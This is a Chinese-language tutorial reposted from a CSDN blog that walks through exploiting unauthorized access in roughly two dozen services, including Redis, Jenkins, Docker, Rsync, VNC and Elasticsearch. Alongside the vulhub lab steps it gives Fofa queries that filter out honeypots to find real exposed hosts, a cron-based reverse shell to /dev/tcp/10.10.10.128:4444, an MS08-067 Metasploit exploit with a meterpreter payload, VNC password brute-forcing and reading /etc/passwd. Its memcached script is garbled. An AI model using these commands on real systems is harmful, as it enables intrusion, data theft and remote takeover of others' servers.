0


【未授权访问漏洞复现~~~】

一: Redis未授权访问漏洞

步骤一:进入vulhub目录使用以下命令启动靶机…

  1. 进入目录:cd /vulhub-master/redis/4-unacc
  2. 启动:docker-compose up-d
  3. 检查:docker-compose ps

步骤二:在Kali上安装redis程序进行服务的链接.

  1. #安装redis
  2. apt-get install redis
  3. #redis链接
  4. redis-cli -h 192.168.4.176 -p 6379
  5. #redis常见命令
  6. (1)查看信息:info
  7. (2)删除所有数据库内容:flushall
  8. (3)刷新数据库:flushdb
  9. (4)看所有键:KEYS *,使用select num可以查看键值数据。
  10. (5)设置变量:set testwhoami"
  11. (6)config set dir dirpath 设置路径等配置
  12. (7)config get dir/dbfilename 获取路径及数据配置信息
  13. (8)save保存
  14. (9)get 变量,查看变量名称

image-20240805203016935

步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞…下载以下攻击项目…

  1. https://github.com/n0b0dyCN/redis-rogue-server

步骤四:使用工具执行以下命令获取目标的命令执行环境,交互时输入i键会获取Shell环境

  1. python3 redis-rogue-server.py --rhost 192.168.4.176 --lhost 192.168.4.108

image-20240805204745397

二: MongoDB未授权访问漏洞

步骤一:在Kali上执行以下命令搭建起MongoDB的漏洞环境…

  1. 拉取镜像:docker pull mongo
  2. 启动容器:docker run -d -p 27017:27017 --name mongodb mongo
  3. 查看容器:docker ps -a

步骤二:使用Nmap的插件脚本进行扫描…发现存在未授权访问漏洞.

  1. # 扫描命令
  2. nmap -p 27017 --script mongodb-info 192.168.4.176

image-20240805205215476

步骤三:也可尝试使用MSF中的模块进行漏洞测试…不需要认证即可直接连接

  1. use auxiliary/scanner/mongodb/mongodb_login
  2. show options
  3. set rhosts 192.168.4.128
  4. set threads 15
  5. exploit

image-20240805205741295

步骤四:即存在未授权访问漏洞使用Navicat进行连接

image-20240805205914845

三: Memcached未授权访问漏洞

步骤一:下载Memcached程序并执行以下命令…启动Memcached漏洞环境

  1. #emcached程序下载
  2. https://www.121down.com/soft/softview-28366.html
  3. https://www.runoob.com/memcached/window-install-memcached.htm
  4. #执行命令
  5. memcached.exe -d install
  6. memcached.exe -d start

步骤二:使用TeInet程序探测目标的11211端口.

  1. #Telnet探测
  2. telnet 192.168.4.199 11211
  3. #操作命令
  4. stats //查看memcache服务状态
  5. stats items //查看所有items
  6. stats cachedump 390//获得缓存key
  7. get:state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容,造成敏感信息泄露

image-20240805210826638

步骤三:使用Nmap程序的脚本进行漏洞扫描

  1. nmap -p11211 --script memcached-info 192.168.4.199

image-20240805210630672

步骤四:漏洞探测脚本(参考)

  1. #!/usr/bin/env python#_*_ coding:utf_8_*defMemcache_check(ip, port=11211,timeout=5):try:
  2. socket.setdefaulttimeout(timeout)
  3. s=socket.socket(socket.AF INET,socket.SOCK STREAM)
  4. s.connect((ipint(port)))
  5. s.send("stats\r\n")
  6. result =s.recv(1024)if"STAT version"in result:print'[+]Memcache Unauthorized:'+ip+':'+str(port)except Exceptione:pass
  7. if__name__=='__main__':
  8. Elasticsearch check("127.0.0.1")
四: Zookeeper未授权访问漏洞

步骤一:使用以下Fofa语法搜索资产信息.

  1. port="2181"

步骤二:在Kali中使用以下命令进行未授权访问漏洞测试,

  1. echo envi | nc ip port
  2. my:
  3. 3.5.192.161 2181

image-20240805202312471

步骤三:可使用Zookeeper可视化管理工具进行连接…

  1. #工具下载
  2. https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

image-20240805202602945

五: Jenkins未授权访问漏洞

步骤一:使用以下fofa语法进行产品搜索.

  1. port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

步骤二:在打开的URL中…点击 Manage Jenkins–>ScritpConsole 在执行以下命令

  1. #执行命令
  2. println "whoami" .execute().text
  3. #命令执行页面
  4. http://125.63.109.2:8080/manage/script/index.php

image-20240805200952439

image-20240805201241792

六: Jupyter NoteBook未授权访问漏洞

步骤一:通过以下fofa语法进行产品搜索…或使用vulhub启动靶场…

  1. #fofa语法
  2. "Jupyter Notebook" && port="8888"
  3. #vulhub靶场
  4. cd /vulhub/jupyter/notebook-rce
  5. docker-compose up -d

步骤二:如果存在未授权访问漏洞则直接访问 http://IP:8888会直接跳到web管理界面,不需要输入密码。
image-20240805113058732

步骤三:从New->Terminal 新建一个终端,通过新建的终端可执行任意命令

  1. #命令执行页面
  2. http://ip/terminals/1

image-20240805113158346

七、Elasticsearch未授权访问漏洞

步骤一:使用以下Fofa语法进行Elasticsearch产品搜索:

  1. "Elasticsearch" && port="9200"

步骤二:存在未授权访问则直接进入到信息页面…不需要输入用户密码登陆.

  1. #目标地址
  2. #访问测试
  3. http://localhost:9200/_plugin/head/web管理界面
  4. http://localhost:9200/_cat/indices
  5. http://localhost:9200/_river/_search 查看数据库敏感信息
  6. http://localhost:9200/_nodes查看节点数据

image-20240805095843893

步骤三:可按照上面查看节点信息等、

image-20240805095912359

八、Kibana未授权访问漏洞

步骤一:使用以下Fofa语句搜索Kibana产品…并打开页面…

  1. "kibana" && port="5601"

步骤二:直接访问Kibana的页面且无需账号密码可以登陆进入界面.

  1. #拼接路径
  2. HTTP://{IP}/app/kibana#/
  3. #eg
  4. my:
  5. http://ip:5601/app/kibana#/
  6. http://ip:5601/app/home#/
  7. http://ip:5601/app/kibana_overview#/

image-20240805101148181

image-20240805101449384

九、Docker Remote APl未授权访问漏洞*

步骤一:使用以下Fofa语句对Docker产品进行搜索…

  1. port="2375"

步骤二:直接使用浏览器访问以下路径…

  1. http://ip:2375/version #查看版本信息
  2. http://ip:2375/info #查看容器信息

image-20240805111603262

步骤三:使用-H参数连接目标主机的docker,使用ps命令查询目标系统运行的镜像。

  1. docker-H tcp://ip:2375 psdocker-H tcp://ip:2375 version
  2. docker-H tcp://ip:2375 exec-it 1f4 /bin/bash
  3. 操作思路:
  4. docker pull 下载有Docker逃逸的容器下来d
  5. ocker逃逸间接获取安装docker主机控制权限

image-20240805112343197

十、Kubernetes Api Server未授权访问漏洞

步骤一:使用以下Fofa语法搜索Kubernetes产品…

  1. port="8080" && app="Kubernetes"

步骤二:在打开的网页中直接访问 8080 端口会返回可用的 API列表…

image-20240805094633046

十一:Hadoop未授权访问漏洞

步骤一:使用以下FOFA语法进行Hadoop产品的搜索…

  1. port="8088" && app="Hadoop"

步骤二:开启页面直接访问不经过用户密码验证…

  1. http://ip:8088/cluster

image-20240805104523382

十二:ActiveMQ未授权访问漏洞

步骤一:使用以下Fofa语法搜索产品…

  1. body="ActiveMQ" && port="8161"

步骤二:ActiveMQ默认使用8161端口,默认用户名和密码是 admin/admin,在打开的页面输入…

  1. http://ip:8161/
  2. http://ip/admin/

第一种

image-20240805105152051

image-20240805105057779

第二种

image-20240805104745887

image-20240805104830399

十三:RabbitMQ未授权访问漏洞

步骤一:使用以下Fofa语法对RabbitMQ产品进行搜索…

  1. port="15672"
  2. port="15692"
  3. port="25672"

步骤二:在打开的页面中可输入默认的账号和密码进行登陆

  1. 默认账号密码都是guest
  2. http://ip15672/
  3. http://ip:15672/

image-20240805105734307

十四:Springboot Actuator未授权访问漏洞

Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块。其提供的执行器端点分为两类:原生端点和用户自定义扩展端点,原生端点主要有:

  1. /dump -显示线程转储(包括堆栈跟踪)
  2. /autoconfig -显示自动配置报告
  3. /configprops-显示配置属性
  4. /trace -显示最后几条HTTP消息(可能包含会话标识符)
  5. /logfile - 输出日志文件的内容
  6. /shutdown -关闭应用程序
  7. /info - 显示应用信息
  8. /metrics -显示当前应用的'指标"信息
  9. /health - 显示应用程序的健康指标
  10. /beans-显示Spring Beans的完整列表
  11. /mappings-显示所有MVC控制器映射
  12. /env - 提供对配置环境的访问
  13. /restart-重新启动应用程序

步骤一:使用以下Fofa语句搜索资产并打开页面访问.

  1. icon_hash="116323821"

步骤二:当 web 应用程序出现 4xx、5xx 错误时显示类似以下页面就能确定当前 web 应用是使用了springboot 框架…

  1. http://ip/

image-20240805110930700

步骤三:拼接以下路径查看泄露的数据

  1. 访问/trace端点获取基本的 HTTP 请求跟踪信息(时间戳、HTTP 头等),如果存在登录用户的操作请求,可以伪造cookie进行登录。
  2. 访问/env端点获取全部环境属性,由于 actuator 会监控站点 mysqlmangodb 之类的数据库服务,所以通过监控信息有时可以mysqlmangodb 数据库信息,如果数据库正好开放在公网,那么造成的危害是巨大的。
  3. git 项目地址泄露,这个一般是在/health 路径,比如如下站点,访问其 health 路径可探测到站点 git 项目地址。
  4. my:
  5. https://ip/

image-20240805110712888

十五:FTP未授权访问漏洞(匿名登陆)

步骤一:对目标环境在资源管理器中用以下格式访问…如果该服务器开启了匿名登陆,则可直接进行内容查看…

  1. ftp://ip:port/

image-20240805114930610

image-20240805115618994

十六:JBoss未授权访问漏洞

步骤一:使用以下语法搜索Jboss产品并打开其页面.

  1. title="Welcome to JBoss"

步骤二:拼接以下路径且无需认证直接进入控制页面.

  1. #拼接路径
  2. http://ip:port/jmx-console/

image-20240805153724576

image-20240805153543627

步骤三:后续可以利用 jboss.deployment 部署shell

十七:Ldap未授权访问漏洞

步骤一:使用以下Fofa语法搜索使用Idap服务的产品.….并通过Ldapadmin可视化工具做连接验证…

  1. #Fofa语法
  2. port="389"
  3. http://www.ldapadmin.org/download/index.html
  4. https://sourceforge.net/projects/ldapadmin/

步骤二:启动工具并测试存在未授权的LDAP服务…成功如下.
在这里插入图片描述

步骤三:连接目标LDAP服务并查看其内容

image-20240805160527541

十八:Rsync未授权访问漏洞

步骤一:在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场!!!

  1. # Fofa语法
  2. (port="873") && (is_honeypot=false && is_fraud=false)
  3. # 启动靶场
  4. cd vulhub/rsync/common
  5. docker-compose up-d

步骤二:可使用Nmap扫描该端口是否开启服务,还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测…

  1. # nmap命令
  2. nmap -p 873 --script rsync-list-modules ipaddress
  3. # Metasploit模块
  4. auxiliary/scanner/rsync/modules list

image-20240805184739996

步骤三:使用命令进行链接并读取文件

  1. 执行命令#
  2. rsync rsync://192.168.124.153:873/
  3. rsync rsync://192.168.124.153:873/src/

image-20240805184840015

步骤四:对系统中的敏感文件下载操作…/etc/passwd

  1. # 执行命令
  2. 命令格式:rsync rsync://IP:port/src/etc/passwd 目标路径
  3. 例如:rsync rsync://192.168.124.153:873/src/etc/passwd /tmp/tmp/
  4. # 结果查看
  5. root@kali:/# cat /tmp/tmp/passwd

image-20240805184921581

步骤五:上传文件…如果有相应的jsp/asp/php环境可以写一句话以phpinfo为例.

  1. #攻击机操作
  2. root@kali:/# echo "<?php phpinfo();?>" > phpinfo.php
  3. root@kali:/# cat ./phpinfo.php
  4. root@kali:/# rsync ./phpinfo.php rsync://192.168.124.153:873/src/home
  5. # 靶机操作
  6. root@4448da0725bd:/#ls
  7. root@4448da0725bd:/# cd home/
  8. root@4448da0725bd:/home#ls
  9. phpinfo.php
  10. root@4448da0725bd:/home# cat phpinfo.php

image-20240805185004953

image-20240805185047236

步骤六:反弹shell…在此可利用定时任务cron来反弹获取shell

  1. # 1.查看定时任务
  2. root@kali:/# rsync rsync://192.168.124.153:873/src/etc/crontab
  3. # 2.将定时任务文件下载下来
  4. rsync rsync://192.168.124.153/src/etc/crontab /tmp/tmp/crontab.txt
  5. # 3.定时任务内容为,大致意思为每17分钟调用一次/etc/cron.hourly
  6. # 4.创建shell文件
  7. #!/bin/bash
  8. /bin/bash i>& /dev/tcp/10.10.10.128/4444 0>&1
  9. chmod 777 shell
  10. #6.上传shell至靶机
  11. root@kali:/#rsync -av /tmp/tmp/shell rsync://192.168.124.153:873/src/etc/cron.hourly
  12. # 7.攻击机开启nc监听相应端口
  13. nc -lvp 4444

image-20240805191603563

十九:VNC未授权访问漏洞

步骤一:使用以下语句在Fofa上进行资产收集…

  1. (port="5900") && (is_honeypot=false && is_fraud=false)

步骤二:可通过MSF中的模块进行检测与漏洞利用.

  1. # VNC未授权检测
  2. msf6>use auxiliary/scanner/vnc/vnc none_auth
  3. msf6 auxiliary(scanner/vnc/vnc none_auth)>show options
  4. msf6 auxiliary(scanner/vnc/vnc none_auth)>set rhosts 192.168.168.200-254
  5. msf6 auxiliary(scanner/vnc/vnc none_auth)>set threads 100
  6. msf6 auxiliary(scanner/vnc/vnc none_auth)>run
  7. # VNC密码爆破
  8. msf6>use auxiliary/scanner/vnc/vnc_login
  9. msf6 auxiliary(scanner/vnc/vnc login)>192.168.168.228
  10. msf6 auxiliary(scanner/vnc/vnc login)>set rhosts 192.168.168.228
  11. msf6 auxiliary(scanner/vnc/vnc login)>set blank_passwords true /密码爆破
  12. msf6 auxiliary(scanner/vnc/vnc login)>run
  13. # 加载攻击模块
  14. msf6 exploit(windows/smb/ms08 067_netapi)>use exploit/windows/smb/ms08_067_netapi
  15. msf6 exploit(windows/smb/ms08 067_netapi)>set payload windows/meterpreter/reverse_tcp
  16. msf6 exploit(windows/smb/ms08 067 netapi)>set rhosts 192.168.168.228
  17. msf6 exploit(windows/smb/ms08 067 netapi)>set lhost 192.168.168.102
  18. msf6 exploit(windows/smb/ms08 067 netapi)>set target 34
  19. msf6 exploit(windows/smb/ms08 067 netapi)>exploit
  20. 获取会话后,直接run vnc可控制远程虚拟机
  21. # 直接控制远程机器
  22. msf6 >use exploit/multi/handler
  23. msf6 exploit(multi/handler)>set payload windows/vncinject/reverse_tcp
  24. msf6 exploit(multi/handler)>set lhost 192.168.168.102
  25. msf6 exploit(multi/handler)>set lport 4466
  26. msf6 exploit(multi/handler)>exploit

步骤三:VNC链接验证…

  1. vncviewer ipaddress
二十:Dubbo未授权访问漏洞

步骤一:使用以下语句在Fofa上进行资产收集.

  1. (app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

步骤二:使用TeInet程序直接进行链接测试…

  1. telnet IP port

image-20240805152925428

二十一:NSF共享目录未授权访问

步骤一:使用以下语句在Fofa上进行资产收集.

  1. "nfs"

步骤二:执行命令进行漏洞复现….

  1. #安装nfs客户端
  2. apt install nfs-common
  3. #查看nfs服务器上的共享目录
  4. showmount -e ip
  5. #挂载相应共享目录到本地
  6. mount -t nfs ip:/grdata /mnt
  7. #卸载目录
  8. umount /mnt

image-20240805193836739

二十二:Druid未授权访问漏洞

步骤一:使用以下语句在Fofa与Google上进行资产收集.

  1. # Fofa
  2. title="Druid Stat Index"
  3. #PHPINFO页面
  4. inurl:phpinfo.php intitle:phpinfo()info.php test.php
  5. # Druid未授权访问
  6. inurl:"druid/index.html" intitle:"Druid Stat Index'

步骤二:对访问到的站点查看…

  1. http://ip:8010/druid/websession.html
  2. http://ip:8088/pos/druid/websession.html

image-20240805194553851

步骤三:Druid批量扫描脚本…

  1. https://github.com/MzzdTOT/CVE-2021-34045
二十三:CouchDB未授权访问

步骤一:使用以下语句在Fofa上进行资产收集…或开启Vulhub靶场进行操作…

  1. # 搜索语法
  2. (port="5984") && (is_honeypot=false && is_fraud=false)
  3. # Vulhub靶场
  4. cd /vulhub/couchdb/CVE-2017-12636
  5. docker-compose up -d

步骤二:执行未授权访问测试命令

  1. curl 192.168.1.4:5984
  2. curl 192.168.1.4:5984/_config

image-20240805195846564

步骤三:反弹Shell参考…

  1. https://blog.csdnnet/qq_45746681/article/details/108933389
二十四:Altassian Crowd未授权访问漏洞

(等待更新)

二十五:RTSP未授权访问漏洞
  1. VLC media player,单击“媒体”选项,选择“打开网络串流”。
  2. 在弹出的窗口中输入网络URL:
  3. rtsp://admin:888888@192.168.1.1:554/cam/realmonitor?channel=2&subtype=1
  4. username:用户名。例如admin
  5. password:密码。例如admin
  6. ip:为设备IP。例如 192.168.1.1.
  7. port:端口号默认为554,若为默认可不填写。
  8. channel:通道号,起始为1。例如通道2,则为channel=2
  9. subtype:码流类型,主码流为0(即subtype=0),辅码流为1(即subtype=1)

步骤一:使用以下语句在Fofa上进行资产收集.

  1. (port=“554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp'

本文转载自: https://blog.csdn.net/m0_59151303/article/details/140937156
版权归原作者 网友小黑 所有, 如有侵权,请联系我们删除。

“【未授权访问漏洞复现~~~】”的评论:

还没有评论